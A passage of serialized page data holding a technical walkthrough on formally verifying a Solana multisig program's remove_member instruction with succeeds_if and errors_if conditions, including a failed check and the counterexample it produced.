new_index",{"type":27,"tag":207,"props":33518,"children":33519},{"style":226},[33520],{"type":33,"value":229},{"type":27,"tag":207,"props":33522,"children":33523},{"style":220},[33524],{"type":33,"value":33108},{"type":27,"tag":207,"props":33526,"children":33527},{"style":226},[33528],{"type":33,"value":1041},{"type":27,"tag":207,"props":33530,"children":33531},{"style":238},[33532],{"type":33,"value":21951},{"type":27,"tag":207,"props":33534,"children":33535},{"style":226},[33536],{"type":33,"value":1041},{"type":27,"tag":207,"props":33538,"children":33539},{"style":238},[33540],{"type":33,"value":31075},{"type":27,"tag":207,"props":33542,"children":33543},{"style":226},[33544],{"type":33,"value":1041},{"type":27,"tag":207,"props":33546,"children":33547},{"style":238},[33548],{"type":33,"value":33549},"transaction_index;\n",{"type":27,"tag":207,"props":33551,"children":33552},{"class":209,"line":7961},[33553,33557,33561,33565,33569,33573,33577,33582,33586,33591],{"type":27,"tag":207,"props":33554,"children":33555},{"style":220},[33556],{"type":33,"value":27495},{"type":27,"tag":207,"props":33558,"children":33559},{"style":226},[33560],{"type":33,"value":1041},{"type":27,"tag":207,"props":33562,"children":33563},{"style":238},[33564],{"type":33,"value":21951},{"type":27,"tag":207,"props":33566,"children":33567},{"style":226},[33568],{"type":33,"value":1041},{"type":27,"tag":207,"props":33570,"children":33571},{"style":238},[33572],{"type":33,"value":31075},{"type":27,"tag":207,"props":33574,"children":33575},{"style":226},[33576],{"type":33,"value":1041},{"type":27,"tag":207,"props":33578,"children":33579},{"style":1335},[33580],{"type":33,"value":33581},"set_change_index",{"type":27,"tag":207,"props":33583,"children":33584},{"style":238},[33585],{"type":33,"value":1343},{"type":27,"tag":207,"props":33587,"children":33588},{"style":220},[33589],{"type":33,"value":33590},"new_index",{"type":27,"tag":207,"props":33592,"children":33593},{"style":238},[33594],{"type":33,"value":10449},{"type":27,"tag":207,"props":33596,"children":33597},{"class":209,"line":7969},[33598],{"type":27,"tag":207,"props":33599,"children":33600},{"style":238},[33601],{"type":33,"value":451},{"type":27,"tag":36,"props":33603,"children":33604},{},[33605,33607,33612],{"type":33,"value":33606},"First let's establish the ",{"type":27,"tag":84,"props":33608,"children":33610},{"className":33609},[],[33611],{"type":33,"value":27426},{"type":33,"value":33613}," condition. We can do this either interactively, following counterexamples like in the first example or we can guess what a sufficient condition might be:",{"type":27,"tag":101,"props":33615,"children":33617},{"code":33616,"language":10269,"meta":7,"className":10270,"style":7},"#[succeeds_if(\n ctx.accounts.multisig.keys.len() > 1\n)]\nfn remove_member(...) { ... }\n",[33618],{"type":27,"tag":84,"props":33619,"children":33620},{"__ignoreMap":7},[33621,33628,33675,33682],{"type":27,"tag":207,"props":33622,"children":33623},{"class":209,"line":210},[33624],{"type":27,"tag":207,"props":33625,"children":33626},{"style":238},[33627],{"type":33,"value":31376},{"type":27,"tag":207,"props":33629,"children":33630},{"class":209,"line":244},[33631,33635,33639,33643,33647,33651,33655,33659,33663,33667,33671],{"type":27,"tag":207,"props":33632,"children":33633},{"style":238},[33634],{"type":33,"value":27495},{"type":27,"tag":207,"props":33636,"children":33637},{"style":226},[33638],{"type":33,"value":1041},{"type":27,"tag":207,"props":33640,"children":33641},{"style":238},[33642],{"type":33,"value":21951},{"type":27,"tag":207,"props":33644,"children":33645},{"style":226},[33646],{"type":33,"value":1041},{"type":27,"tag":207,"props":33648,"children":33649},{"style":238},[33650],{"type":33,"value":31075},{"type":27,"tag":207,"props":33652,"children":33653},{"style":226},[33654],{"type":33,"value":1041},{"type":27,"tag":207,"props":33656,"children":33657},{"style":238},[33658],{"type":33,"value":28255},{"type":27,"tag":207,"props":33660,"children":33661},{"style":226},[33662],{"type":33,"value":1041},{"type":27,"tag":207,"props":33664,"children":33665},{"style":238},[33666],{"type":33,"value":28293},{"type":27,"tag":207,"props":33668,"children":33669},{"style":226},[33670],{"type":33,"value":17739},{"type":27,"tag":207,"props":33672,"children":33673},{"style":238},[33674],{"type":33,"value":26713},{"type":27,"tag":207,"props":33676,"children":33677},{"class":209,"line":270},[33678],{"type":27,"tag":207,"props":33679,"children":33680},{"style":238},[33681],{"type":33,"value":27530},{"type":27,"tag":207,"props":33683,"children":33684},{"class":209,"line":296},[33685,33689,33693,33697,33701,33705,33709],{"type":27,"tag":207,"props":33686,"children":33687},{"style":214},[33688],{"type":33,"value":27538},{"type":27,"tag":207,"props":33690,"children":33691},{"style":1335},[33692],{"type":33,"value":33030},{"type":27,"tag":207,"props":33694,"children":33695},{"style":238},[33696],{"type":33,"value":1343},{"type":27,"tag":207,"props":33698,"children":33699},{"style":226},[33700],{"type":33,"value":16867},{"type":27,"tag":207,"props":33702,"children":33703},{"style":238},[33704],{"type":33,"value":31253},{"type":27,"tag":207,"props":33706,"children":33707},{"style":226},[33708],{"type":33,"value":16867},{"type":27,"tag":207,"props":33710,"children":33711},{"style":238},[33712],{"type":33,"value":16872},{"type":27,"tag":36,"props":33714,"children":33715},{},[33716,33718,33723],{"type":33,"value":33717},"And for now let's remove the invariant on the ",{"type":27,"tag":84,"props":33719,"children":33721},{"className":33720},[],[33722],{"type":33,"value":30014},{"type":33,"value":33724}," account:",{"type":27,"tag":101,"props":33726,"children":33728},{"code":33727,"language":10269,"meta":7,"className":10270,"style":7},"#[invariant()]\npub struct Ms { ... }\n",[33729],{"type":27,"tag":84,"props":33730,"children":33731},{"__ignoreMap":7},[33732,33740],{"type":27,"tag":207,"props":33733,"children":33734},{"class":209,"line":210},[33735],{"type":27,"tag":207,"props":33736,"children":33737},{"style":238},[33738],{"type":33,"value":33739},"#[invariant()]\n",{"type":27,"tag":207,"props":33741,"children":33742},{"class":209,"line":244},[33743,33747,33751,33755,33759,33763],{"type":27,"tag":207,"props":33744,"children":33745},{"style":214},[33746],{"type":33,"value":20967},{"type":27,"tag":207,"props":33748,"children":33749},{"style":214},[33750],{"type":33,"value":28423},{"type":27,"tag":207,"props":33752,"children":33753},{"style":8920},[33754],{"type":33,"value":28428},{"type":27,"tag":207,"props":33756,"children":33757},{"style":238},[33758],{"type":33,"value":16862},{"type":27,"tag":207,"props":33760,"children":33761},{"style":226},[33762],{"type":33,"value":16867},{"type":27,"tag":207,"props":33764,"children":33765},{"style":238},[33766],{"type":33,"value":16872},{"type":27,"tag":36,"props":33768,"children":33769},{},[33770],{"type":33,"value":33771},"Let's test this!",{"type":27,"tag":36,"props":33773,"children":33774},{},[33775,33777,33782],{"type":33,"value":33776},"Our ",{"type":27,"tag":84,"props":33778,"children":33780},{"className":33779},[],[33781],{"type":33,"value":27426},{"type":33,"value":33783}," harness produces:",{"type":27,"tag":101,"props":33785,"children":33787},{"code":33786},"VERIFICATION:- SUCCESSFUL\nVerification Time: 28.119272s\n",[33788],{"type":27,"tag":84,"props":33789,"children":33790},{"__ignoreMap":7},[33791],{"type":33,"value":33786},{"type":27,"tag":36,"props":33793,"children":33794},{},[33795],{"type":33,"value":33796},"This tells us that if our multisig has at least two keys then the instruction will succeed.",{"type":27,"tag":36,"props":33798,"children":33799},{},[33800,33802,33807],{"type":33,"value":33801},"However, remember that since ",{"type":27,"tag":84,"props":33803,"children":33805},{"className":33804},[],[33806],{"type":33,"value":27426},{"type":33,"value":33808}," represents just the sufficient conditions, there may be other cases where the function succeeds.",{"type":27,"tag":36,"props":33810,"children":33811},{},[33812,33814,33819,33821,33826,33828,33833],{"type":33,"value":33813},"Suppose we want to be sure that this condition is the ",{"type":27,"tag":942,"props":33815,"children":33816},{},[33817],{"type":33,"value":33818},"only condition",{"type":33,"value":33820}," in which the function will succeed (i.e. ",{"type":27,"tag":942,"props":33822,"children":33823},{},[33824],{"type":33,"value":33825},"\"the function will succeed if and only if the multisig has at least two keys\"",{"type":33,"value":33827},"). We could attempt to verify the other side of this with an ",{"type":27,"tag":84,"props":33829,"children":33831},{"className":33830},[],[33832],{"type":33,"value":27433},{"type":33,"value":33834}," macro such as:",{"type":27,"tag":101,"props":33836,"children":33838},{"code":33837,"language":10269,"meta":7,"className":10270,"style":7},"#[succeeds_if(\n ctx.accounts.multisig.keys.len() > 1\n)]\n#[errors_if(\n ctx.accounts.multisig.keys.len() \u003C= 1\n)]\nfn remove_member(...) { ... }\n",[33839],{"type":27,"tag":84,"props":33840,"children":33841},{"__ignoreMap":7},[33842,33849,33896,33903,33910,33957,33964],{"type":27,"tag":207,"props":33843,"children":33844},{"class":209,"line":210},[33845],{"type":27,"tag":207,"props":33846,"children":33847},{"style":238},[33848],{"type":33,"value":31376},{"type":27,"tag":207,"props":33850,"children":33851},{"class":209,"line":244},[33852,33856,33860,33864,33868,33872,33876,33880,33884,33888,33892],{"type":27,"tag":207,"props":33853,"children":33854},{"style":238},[33855],{"type":33,"value":27495},{"type":27,"tag":207,"props":33857,"children":33858},{"style":226},[33859],{"type":33,"value":1041},{"type":27,"tag":207,"props":33861,"children":33862},{"style":238},[33863],{"type":33,"value":21951},{"type":27,"tag":207,"props":33865,"children":33866},{"style":226},[33867],{"type":33,"value":1041},{"type":27,"tag":207,"props":33869,"children":33870},{"style":238},[33871],{"type":33,"value":31075},{"type":27,"tag":207,"props":33873,"children":33874},{"style":226},[33875],{"type":33,"value":1041},{"type":27,"tag":207,"props":33877,"children":33878},{"style":238},[33879],{"type":33,"value":28255},{"type":27,"tag":207,"props":33881,"children":33882},{"style":226},[33883],{"type":33,"value":1041},{"type":27,"tag":207,"props":33885,"children":33886},{"style":238},[33887],{"type":33,"value":28293},{"type":27,"tag":207,"props":33889,"children":33890},{"style":226},[33891],{"type":33,"value":17739},{"type":27,"tag":207,"props":33893,"children":33894},{"style":238},[33895],{"type":33,"value":26713},{"type":27,"tag":207,"props":33897,"children":33898},{"class":209,"line":270},[33899],{"type":27,"tag":207,"props":33900,"children":33901},{"style":238},[33902],{"type":33,"value":27530},{"type":27,"tag":207,"props":33904,"children":33905},{"class":209,"line":296},[33906],{"type":27,"tag":207,"props":33907,"children":33908},{"style":238},[33909],{"type":33,"value":27487},{"type":27,"tag":207,"props":33911,"children":33912},{"class":209,"line":445},[33913,33917,33921,33925,33929,33933,33937,33941,33945,33949,33953],{"type":27,"tag":207,"props":33914,"children":33915},{"style":238},[33916],{"type":33,"value":27495},{"type":27,"tag":207,"props":33918,"children":33919},{"style":226},[33920],{"type":33,"value":1041},{"type":27,"tag":207,"props":33922,"children":33923},{"style":238},[33924],{"type":33,"value":21951},{"type":27,"tag":207,"props":33926,"children":33927},{"style":226},[33928],{"type":33,"value":1041},{"type":27,"tag":207,"props":33930,"children":33931},{"style":238},[33932],{"type":33,"value":31075},{"type":27,"tag":207,"props":33934,"children":33935},{"style":226},[33936],{"type":33,"value":1041},{"type":27,"tag":207,"props":33938,"children":33939},{"style":238},[33940],{"type":33,"value":28255},{"type":27,"tag":207,"props":33942,"children":33943},{"style":226},[33944],{"type":33,"value":1041},{"type":27,"tag":207,"props":33946,"children":33947},{"style":238},[33948],{"type":33,"value":28293},{"type":27,"tag":207,"props":33950,"children":33951},{"style":226},[33952],{"type":33,"value":26685},{"type":27,"tag":207,"props":33954,"children":33955},{"style":238},[33956],{"type":33,"value":26713},{"type":27,"tag":207,"props":33958,"children":33959},{"class":209,"line":867},[33960],{"type":27,"tag":207,"props":33961,"children":33962},{"style":238},[33963],{"type":33,"value":27530},{"type":27,"tag":207,"props":33965,"children":33966},{"class":209,"line":892},[33967,33971,33975,33979,33983,33987,33991],{"type":27,"tag":207,"props":33968,"children":33969},{"style":214},[33970],{"type":33,"value":27538},{"type":27,"tag":207,"props":33972,"children":33973},{"style":1335},[33974],{"type":33,"value":33030},{"type":27,"tag":207,"props":33976,"children":33977},{"style":238},[33978],{"type":33,"value":1343},{"type":27,"tag":207,"props":33980,"children":33981},{"style":226},[33982],{"type":33,"value":16867},{"type":27,"tag":207,"props":33984,"children":33985},{"style":238},[33986],{"type":33,"value":31253},{"type":27,"tag":207,"props":33988,"children":33989},{"style":226},[33990],{"type":33,"value":16867},{"type":27,"tag":207,"props":33992,"children":33993},{"style":238},[33994],{"type":33,"value":16872},{"type":27,"tag":36,"props":33996,"children":33997},{},[33998,34000,34005],{"type":33,"value":33999},"Let's test this, we just need to run the new ",{"type":27,"tag":84,"props":34001,"children":34003},{"className":34002},[],[34004],{"type":33,"value":27433},{"type":33,"value":34006}," harness:",{"type":27,"tag":101,"props":34008,"children":34010},{"code":34009},"VERIFICATION:- FAILED\nVerification Time: 31.900913s\n",[34011],{"type":27,"tag":84,"props":34012,"children":34013},{"__ignoreMap":7},[34014],{"type":33,"value":34009},{"type":27,"tag":36,"props":34016,"children":34017},{},[34018],{"type":33,"value":34019},"Hmm, this verification failed! Let's look at the counterexample. The multisig it is trying to remove a member from looks like:",{"type":27,"tag":101,"props":34021,"children":34023},{"code":34022,"language":10269,"meta":7,"className":10270,"style":7},"Account {\n account: Ms {\n threshold: 0,\n authority_index: 0,\n transaction_index: 0,\n ms_change_index: 0,\n bump: 0,\n create_key: ...,\n allow_external_execute: false,\n keys: Vec {\n data: ...,\n size: 0,\n },\n },\n info: AccountInfo { ... },\n}\n",[34024],{"type":27,"tag":84,"props":34025,"children":34026},{"__ignoreMap":7},[34027,34038,34057,34076,34095,34114,34133,34152,34171,34190,34209,34229,34248,34255,34262,34289],{"type":27,"tag":207,"props":34028,"children":34029},{"class":209,"line":210},[34030,34034],{"type":27,"tag":207,"props":34031,"children":34032},{"style":8920},[34033],{"type":33,"value":24420},{"type":27,"tag":207,"props":34035,"children":34036},{"style":238},[34037],{"type":33,"value":384},{"type":27,"tag":207,"props":34039,"children":34040},{"class":209,"line":244},[34041,34045,34049,34053],{"type":27,"tag":207,"props":34042,"children":34043},{"style":220},[34044],{"type":33,"value":32436},{"type":27,"tag":207,"props":34046,"children":34047},{"style":226},[34048],{"type":33,"value":736},{"type":27,"tag":207,"props":34050,"children":34051},{"style":8920},[34052],{"type":33,"value":28428},{"type":27,"tag":207,"props":34054,"children":34055},{"style":238},[34056],{"type":33,"value":384},{"type":27,"tag":207,"props":34058,"children":34059},{"class":209,"line":270},[34060,34064,34068,34072],{"type":27,"tag":207,"props":34061,"children":34062},{"style":220},[34063],{"type":33,"value":31095},{"type":27,"tag":207,"props":34065,"children":34066},{"style":226},[34067],{"type":33,"value":736},{"type":27,"tag":207,"props":34069,"children":34070},{"style":232},[34071],{"type":33,"value":4680},{"type":27,"tag":207,"props":34073,"children":34074},{"style":238},[34075],{"type":33,"value":1842},{"type":27,"tag":207,"props":34077,"children":34078},{"class":209,"line":296},[34079,34083,34087,34091],{"type":27,"tag":207,"props":34080,"children":34081},{"style":220},[34082],{"type":33,"value":32476},{"type":27,"tag":207,"props":34084,"children":34085},{"style":226},[34086],{"type":33,"value":736},{"type":27,"tag":207,"props":34088,"children":34089},{"style":232},[34090],{"type":33,"value":4680},{"type":27,"tag":207,"props":34092,"children":34093},{"style":238},[34094],{"type":33,"value":1842},{"type":27,"tag":207,"props":34096,"children":34097},{"class":209,"line":445},[34098,34102,34106,34110],{"type":27,"tag":207,"props":34099,"children":34100},{"style":220},[34101],{"type":33,"value":32496},{"type":27,"tag":207,"props":34103,"children":34104},{"style":226},[34105],{"type":33,"value":736},{"type":27,"tag":207,"props":34107,"children":34108},{"style":232},[34109],{"type":33,"value":4680},{"type":27,"tag":207,"props":34111,"children":34112},{"style":238},[34113],{"type":33,"value":1842},{"type":27,"tag":207,"props":34115,"children":34116},{"class":209,"line":867},[34117,34121,34125,34129],{"type":27,"tag":207,"props":34118,"children":34119},{"style":220},[34120],{"type":33,"value":32516},{"type":27,"tag":207,"props":34122,"children":34123},{"style":226},[34124],{"type":33,"value":736},{"type":27,"tag":207,"props":34126,"children":34127},{"style":232},[34128],{"type":33,"value":4680},{"type":27,"tag":207,"props":34130,"children":34131},{"style":238},[34132],{"type":33,"value":1842},{"type":27,"tag":207,"props":34134,"children":34135},{"class":209,"line":892},[34136,34140,34144,34148],{"type":27,"tag":207,"props":34137,"children":34138},{"style":220},[34139],{"type":33,"value":32536},{"type":27,"tag":207,"props":34141,"children":34142},{"style":226},[34143],{"type":33,"value":736},{"type":27,"tag":207,"props":34145,"children":34146},{"style":232},[34147],{"type":33,"value":4680},{"type":27,"tag":207,"props":34149,"children":34150},{"style":238},[34151],{"type":33,"value":1842},{"type":27,"tag":207,"props":34153,"children":34154},{"class":209,"line":1475},[34155,34159,34163,34167],{"type":27,"tag":207,"props":34156,"children":34157},{"style":220},[34158],{"type":33,"value":31107},{"type":27,"tag":207,"props":34160,"children":34161},{"style":226},[34162],{"type":33,"value":736},{"type":27,"tag":207,"props":34164,"children":34165},{"style":226},[34166],{"type":33,"value":32564},{"type":27,"tag":207,"props":34168,"children":34169},{"style":238},[34170],{"type":33,"value":1842},{"type":27,"tag":207,"props":34172,"children":34173},{"class":209,"line":2065},[34174,34178,34182,34186],{"type":27,"tag":207,"props":34175,"children":34176},{"style":220},[34177],{"type":33,"value":32576},{"type":27,"tag":207,"props":34179,"children":34180},{"style":226},[34181],{"type":33,"value":736},{"type":27,"tag":207,"props":34183,"children":34184},{"style":214},[34185],{"type":33,"value":16337},{"type":27,"tag":207,"props":34187,"children":34188},{"style":238},[34189],{"type":33,"value":1842},{"type":27,"tag":207,"props":34191,"children":34192},{"class":209,"line":2092},[34193,34197,34201,34205],{"type":27,"tag":207,"props":34194,"children":34195},{"style":220},[34196],{"type":33,"value":32596},{"type":27,"tag":207,"props":34198,"children":34199},{"style":226},[34200],{"type":33,"value":736},{"type":27,"tag":207,"props":34202,"children":34203},{"style":8920},[34204],{"type":33,"value":28661},{"type":27,"tag":207,"props":34206,"children":34207},{"style":238},[34208],{"type":33,"value":384},{"type":27,"tag":207,"props":34210,"children":34211},{"class":209,"line":2130},[34212,34217,34221,34225],{"type":27,"tag":207,"props":34213,"children":34214},{"style":220},[34215],{"type":33,"value":34216}," data",{"type":27,"tag":207,"props":34218,"children":34219},{"style":226},[34220],{"type":33,"value":736},{"type":27,"tag":207,"props":34222,"children":34223},{"style":226},[34224],{"type":33,"value":32564},{"type":27,"tag":207,"props":34226,"children":34227},{"style":238},[34228],{"type":33,"value":1842},{"type":27,"tag":207,"props":34230,"children":34231},{"class":209,"line":2168},[34232,34236,34240,34244],{"type":27,"tag":207,"props":34233,"children":34234},{"style":220},[34235],{"type":33,"value":32617},{"type":27,"tag":207,"props":34237,"children":34238},{"style":226},[34239],{"type":33,"value":736},{"type":27,"tag":207,"props":34241,"children":34242},{"style":232},[34243],{"type":33,"value":4680},{"type":27,"tag":207,"props":34245,"children":34246},{"style":238},[34247],{"type":33,"value":1842},{"type":27,"tag":207,"props":34249,"children":34250},{"class":209,"line":4095},[34251],{"type":27,"tag":207,"props":34252,"children":34253},{"style":238},[34254],{"type":33,"value":32638},{"type":27,"tag":207,"props":34256,"children":34257},{"class":209,"line":4103},[34258],{"type":27,"tag":207,"props":34259,"children":34260},{"style":238},[34261],{"type":33,"value":32646},{"type":27,"tag":207,"props":34263,"children":34264},{"class":209,"line":4154},[34265,34269,34273,34277,34281,34285],{"type":27,"tag":207,"props":34266,"children":34267},{"style":220},[34268],{"type":33,"value":32654},{"type":27,"tag":207,"props":34270,"children":34271},{"style":226},[34272],{"type":33,"value":736},{"type":27,"tag":207,"props":34274,"children":34275},{"style":8920},[34276],{"type":33,"value":32663},{"type":27,"tag":207,"props":34278,"children":34279},{"style":238},[34280],{"type":33,"value":16862},{"type":27,"tag":207,"props":34282,"children":34283},{"style":226},[34284],{"type":33,"value":16867},{"type":27,"tag":207,"props":34286,"children":34287},{"style":238},[34288],{"type":33,"value":32676},{"type":27,"tag":207,"props":34290,"children":34291},{"class":209,"line":4203},[34292],{"type":27,"tag":207,"props":34293,"children":34294},{"style":238},[34295],{"type":33,"value":451},{"type":27,"tag":36,"props":34297,"children":34298},{},[34299],{"type":33,"value":34300},"Interestingly, the multisig has 0 keys and yet this instruction does not error. Let's take a closer look to figure out why:",{"type":27,"tag":36,"props":34302,"children":34303},{},[34304,34306,34312],{"type":33,"value":34305},"Inside our handler, we see that it only checks if the number of keys exactly equals 1. Otherwise it invokes ",{"type":27,"tag":84,"props":34307,"children":34309},{"className":34308},[],[34310],{"type":33,"value":34311},"Ms::remove_member",{"type":33,"value":736},{"type":27,"tag":101,"props":34314,"children":34316},{"code":34315,"language":10269,"meta":7,"className":10270,"style":7},"if ctx.accounts.multisig.keys.len() == 1 {\n return err!(MsError::CannotRemoveSoloMember);\n}\nctx.accounts.multisig.remove_member(old_member)?;\n",[34317],{"type":27,"tag":84,"props":34318,"children":34319},{"__ignoreMap":7},[34320,34379,34410,34417],{"type":27,"tag":207,"props":34321,"children":34322},{"class":209,"line":210},[34323,34327,34331,34335,34339,34343,34347,34351,34355,34359,34363,34367,34371,34375],{"type":27,"tag":207,"props":34324,"children":34325},{"style":376},[34326],{"type":33,"value":9023},{"type":27,"tag":207,"props":34328,"children":34329},{"style":220},[34330],{"type":33,"value":33108},{"type":27,"tag":207,"props":34332,"children":34333},{"style":226},[34334],{"type":33,"value":1041},{"type":27,"tag":207,"props":34336,"children":34337},{"style":238},[34338],{"type":33,"value":21951},{"type":27,"tag":207,"props":34340,"children":34341},{"style":226},[34342],{"type":33,"value":1041},{"type":27,"tag":207,"props":34344,"children":34345},{"style":238},[34346],{"type":33,"value":31075},{"type":27,"tag":207,"props":34348,"children":34349},{"style":226},[34350],{"type":33,"value":1041},{"type":27,"tag":207,"props":34352,"children":34353},{"style":238},[34354],{"type":33,"value":28255},{"type":27,"tag":207,"props":34356,"children":34357},{"style":226},[34358],{"type":33,"value":1041},{"type":27,"tag":207,"props":34360,"children":34361},{"style":1335},[34362],{"type":33,"value":16416},{"type":27,"tag":207,"props":34364,"children":34365},{"style":238},[34366],{"type":33,"value":21319},{"type":27,"tag":207,"props":34368,"children":34369},{"style":226},[34370],{"type":33,"value":15856},{"type":27,"tag":207,"props":34372,"children":34373},{"style":232},[34374],{"type":33,"value":235},{"type":27,"tag":207,"props":34376,"children":34377},{"style":238},[34378],{"type":33,"value":384},{"type":27,"tag":207,"props":34380,"children":34381},{"class":209,"line":244},[34382,34386,34390,34394,34398,34402,34406],{"type":27,"tag":207,"props":34383,"children":34384},{"style":376},[34385],{"type":33,"value":8986},{"type":27,"tag":207,"props":34387,"children":34388},{"style":1335},[34389],{"type":33,"value":30791},{"type":27,"tag":207,"props":34391,"children":34392},{"style":238},[34393],{"type":33,"value":1343},{"type":27,"tag":207,"props":34395,"children":34396},{"style":8920},[34397],{"type":33,"value":30800},{"type":27,"tag":207,"props":34399,"children":34400},{"style":226},[34401],{"type":33,"value":10768},{"type":27,"tag":207,"props":34403,"children":34404},{"style":8920},[34405],{"type":33,"value":33184},{"type":27,"tag":207,"props":34407,"children":34408},{"style":238},[34409],{"type":33,"value":1455},{"type":27,"tag":207,"props":34411,"children":34412},{"class":209,"line":270},[34413],{"type":27,"tag":207,"props":34414,"children":34415},{"style":238},[34416],{"type":33,"value":451},{"type":27,"tag":207,"props":34418,"children":34419},{"class":209,"line":296},[34420,34424,34428,34432,34436,34440,34444,34448,34452,34456,34460,34464],{"type":27,"tag":207,"props":34421,"children":34422},{"style":220},[34423],{"type":33,"value":27552},{"type":27,"tag":207,"props":34425,"children":34426},{"style":226},[34427],{"type":33,"value":1041},{"type":27,"tag":207,"props":34429,"children":34430},{"style":238},[34431],{"type":33,"value":21951},{"type":27,"tag":207,"props":34433,"children":34434},{"style":226},[34435],{"type":33,"value":1041},{"type":27,"tag":207,"props":34437,"children":34438},{"style":238},[34439],{"type":33,"value":31075},{"type":27,"tag":207,"props":34441,"children":34442},{"style":226},[34443],{"type":33,"value":1041},{"type":27,"tag":207,"props":34445,"children":34446},{"style":1335},[34447],{"type":33,"value":32731},{"type":27,"tag":207,"props":34449,"children":34450},{"style":238},[34451],{"type":33,"value":1343},{"type":27,"tag":207,"props":34453,"children":34454},{"style":220},[34455],{"type":33,"value":33064},{"type":27,"tag":207,"props":34457,"children":34458},{"style":238},[34459],{"type":33,"value":10416},{"type":27,"tag":207,"props":34461,"children":34462},{"style":226},[34463],{"type":33,"value":10444},{"type":27,"tag":207,"props":34465,"children":34466},{"style":238},[34467],{"type":33,"value":241},{"type":27,"tag":36,"props":34469,"children":34470},{},[34471,34473,34479,34481,34487],{"type":33,"value":34472},"In that function, it checks if the member to remove is contained in that multisig (with ",{"type":27,"tag":84,"props":34474,"children":34476},{"className":34475},[],[34477],{"type":33,"value":34478},"Ms::is_member",{"type":33,"value":34480},") and if it is not, it simply skips the removal and returns ",{"type":27,"tag":84,"props":34482,"children":34484},{"className":34483},[],[34485],{"type":33,"value":34486},"Ok(())",{"type":33,"value":1041},{"type":27,"tag":101,"props":34489,"children":34491},{"code":34490,"language":10269,"meta":7,"className":10270,"style":7},"pub fn remove_member(&mut self, member: Pubkey) -> Result\u003C()> {\n if let Some(ind) = self.is_member(member) {\n self.keys.remove(ind);\n if self.keys.len() \u003C usize::from(self.threshold) {\n self.threshold = self.keys.len().try_into().unwrap();\n }\n }\n Ok(())\n}\n",[34492],{"type":27,"tag":84,"props":34493,"children":34494},{"__ignoreMap":7},[34495,34559,34618,34655,34714,34782,34789,34796,34807],{"type":27,"tag":207,"props":34496,"children":34497},{"class":209,"line":210},[34498,34502,34506,34510,34514,34518,34522,34526,34530,34535,34539,34543,34547,34551,34555],{"type":27,"tag":207,"props":34499,"children":34500},{"style":214},[34501],{"type":33,"value":20967},{"type":27,"tag":207,"props":34503,"children":34504},{"style":214},[34505],{"type":33,"value":20972},{"type":27,"tag":207,"props":34507,"children":34508},{"style":1335},[34509],{"type":33,"value":33030},{"type":27,"tag":207,"props":34511,"children":34512},{"style":238},[34513],{"type":33,"value":1343},{"type":27,"tag":207,"props":34515,"children":34516},{"style":226},[34517],{"type":33,"value":10398},{"type":27,"tag":207,"props":34519,"children":34520},{"style":214},[34521],{"type":33,"value":11009},{"type":27,"tag":207,"props":34523,"children":34524},{"style":214},[34525],{"type":33,"value":21073},{"type":27,"tag":207,"props":34527,"children":34528},{"style":238},[34529],{"type":33,"value":1123},{"type":27,"tag":207,"props":34531,"children":34532},{"style":220},[34533],{"type":33,"value":34534},"member",{"type":27,"tag":207,"props":34536,"children":34537},{"style":226},[34538],{"type":33,"value":736},{"type":27,"tag":207,"props":34540,"children":34541},{"style":8920},[34542],{"type":33,"value":28129},{"type":27,"tag":207,"props":34544,"children":34545},{"style":238},[34546],{"type":33,"value":2222},{"type":27,"tag":207,"props":34548,"children":34549},{"style":226},[34550],{"type":33,"value":8968},{"type":27,"tag":207,"props":34552,"children":34553},{"style":8920},[34554],{"type":33,"value":21038},{"type":27,"tag":207,"props":34556,"children":34557},{"style":238},[34558],{"type":33,"value":27603},{"type":27,"tag":207,"props":34560,"children":34561},{"class":209,"line":244},[34562,34566,34571,34576,34580,34585,34589,34593,34597,34601,34606,34610,34614],{"type":27,"tag":207,"props":34563,"children":34564},{"style":376},[34565],{"type":33,"value":19556},{"type":27,"tag":207,"props":34567,"children":34568},{"style":214},[34569],{"type":33,"value":34570}," let",{"type":27,"tag":207,"props":34572,"children":34573},{"style":8920},[34574],{"type":33,"value":34575}," Some",{"type":27,"tag":207,"props":34577,"children":34578},{"style":238},[34579],{"type":33,"value":1343},{"type":27,"tag":207,"props":34581,"children":34582},{"style":220},[34583],{"type":33,"value":34584},"ind",{"type":27,"tag":207,"props":34586,"children":34587},{"style":238},[34588],{"type":33,"value":2222},{"type":27,"tag":207,"props":34590,"children":34591},{"style":226},[34592],{"type":33,"value":10380},{"type":27,"tag":207,"props":34594,"children":34595},{"style":214},[34596],{"type":33,"value":21073},{"type":27,"tag":207,"props":34598,"children":34599},{"style":226},[34600],{"type":33,"value":1041},{"type":27,"tag":207,"props":34602,"children":34603},{"style":1335},[34604],{"type":33,"value":34605},"is_member",{"type":27,"tag":207,"props":34607,"children":34608},{"style":238},[34609],{"type":33,"value":1343},{"type":27,"tag":207,"props":34611,"children":34612},{"style":220},[34613],{"type":33,"value":34534},{"type":27,"tag":207,"props":34615,"children":34616},{"style":238},[34617],{"type":33,"value":1424},{"type":27,"tag":207,"props":34619,"children":34620},{"class":209,"line":270},[34621,34626,34630,34634,34638,34643,34647,34651],{"type":27,"tag":207,"props":34622,"children":34623},{"style":214},[34624],{"type":33,"value":34625}," self",{"type":27,"tag":207,"props":34627,"children":34628},{"style":226},[34629],{"type":33,"value":1041},{"type":27,"tag":207,"props":34631,"children":34632},{"style":238},[34633],{"type":33,"value":28255},{"type":27,"tag":207,"props":34635,"children":34636},{"style":226},[34637],{"type":33,"value":1041},{"type":27,"tag":207,"props":34639,"children":34640},{"style":1335},[34641],{"type":33,"value":34642},"remove",{"type":27,"tag":207,"props":34644,"children":34645},{"style":238},[34646],{"type":33,"value":1343},{"type":27,"tag":207,"props":34648,"children":34649},{"style":220},[34650],{"type":33,"value":34584},{"type":27,"tag":207,"props":34652,"children":34653},{"style":238},[34654],{"type":33,"value":1455},{"type":27,"tag":207,"props":34656,"children":34657},{"class":209,"line":296},[34658,34662,34666,34670,34674,34678,34682,34686,34690,34694,34698,34702,34706,34710],{"type":27,"tag":207,"props":34659,"children":34660},{"style":376},[34661],{"type":33,"value":10562},{"type":27,"tag":207,"props":34663,"children":34664},{"style":214},[34665],{"type":33,"value":21073},{"type":27,"tag":207,"props":34667,"children":34668},{"style":226},[34669],{"type":33,"value":1041},{"type":27,"tag":207,"props":34671,"children":34672},{"style":238},[34673],{"type":33,"value":28255},{"type":27,"tag":207,"props":34675,"children":34676},{"style":226},[34677],{"type":33,"value":1041},{"type":27,"tag":207,"props":34679,"children":34680},{"style":1335},[34681],{"type":33,"value":16416},{"type":27,"tag":207,"props":34683,"children":34684},{"style":238},[34685],{"type":33,"value":33309},{"type":27,"tag":207,"props":34687,"children":34688},{"style":8920},[34689],{"type":33,"v